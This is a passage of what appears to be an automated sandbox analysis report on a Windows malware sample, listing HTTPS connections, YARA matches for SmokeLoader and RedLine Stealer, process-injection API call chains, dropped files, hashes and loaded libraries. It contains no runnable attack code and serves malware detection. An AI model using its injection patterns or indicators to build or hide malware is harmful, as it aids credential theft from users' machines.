          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49752 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49758 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49763 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Yara detected SmokeLoader
          Source: Yara matchFile source: 00000005.00000002.2006931443.00000000045B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1722506072.00000000029D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1722473100.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2006836932.0000000004460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000002.2006931443.00000000045B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000000.00000002.1722703723.0000000002BA2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000005.00000002.2006696706.0000000002882000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.1722506072.00000000029D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000000.00000002.1722473100.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000000.00000002.1722456643.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000005.00000002.2006836932.0000000004460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000005.00000002.2006818821.0000000004450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401538
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402FE9 HeapCreate,RtlCreateUserThread,NtTerminateProcess,0_2_00402FE9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401496
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401543
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401565
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401579
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040157C
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401538
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_00402FE9 HeapCreate,RtlCreateUserThread,NtTerminateProcess,5_2_00402FE9
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014DE
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401496
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401543
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401565
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401579
          Source: C:\Users\user\AppData\Roaming\crwjtgtCode function: 5_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040157C
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\8FDD.exe CAE992788853230AF91501546F6EAD07CFD767CB8429C98A273093A90BBCB5AD
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 7124
          Source: file.exe, 00000000.00000000.1620217698.0000000002816000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesAtlassing0 vs file.exe
          Source: file.exeBinary or memory string: OriginalFilenamesAtlassing0 vs file.exe
          Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 00000005.00000002.2006931443.00000000045B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000000.00000002.1722703723.0000000002BA2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000005.00000002.2006696706.0000000002882000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.1722506072.00000000029D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000000.00000002.1722473100.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000000.00000002.1722456643.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000005.00000002.2006836932.0000000004460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000005.00000002.2006818821.0000000004450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: crwjtgt.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/10@9/6
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02BA98DD CreateToolhelp32Snapshot,Module32First,0_2_02BA98DD
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\crwjtgtJump to behavior
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8FDD.tmpJump to behavior
          Source: unknownProcess created: C:\Windows\explorer.exe
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 8FDD.exe, 00000006.00000003.2115927274.0000000003D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeVirustotal: Detection: 43%
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\crwjtgt C:\Users\user\AppData\Roaming\crwjtgt
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8FDD.exe C:\Users\user\AppData\Local\Temp\8FDD.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 7124
          Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8FDD.exe C:\Users\user\AppData\Local\Temp\8FDD.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\crwjtgtSection loaded: msvcr100.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
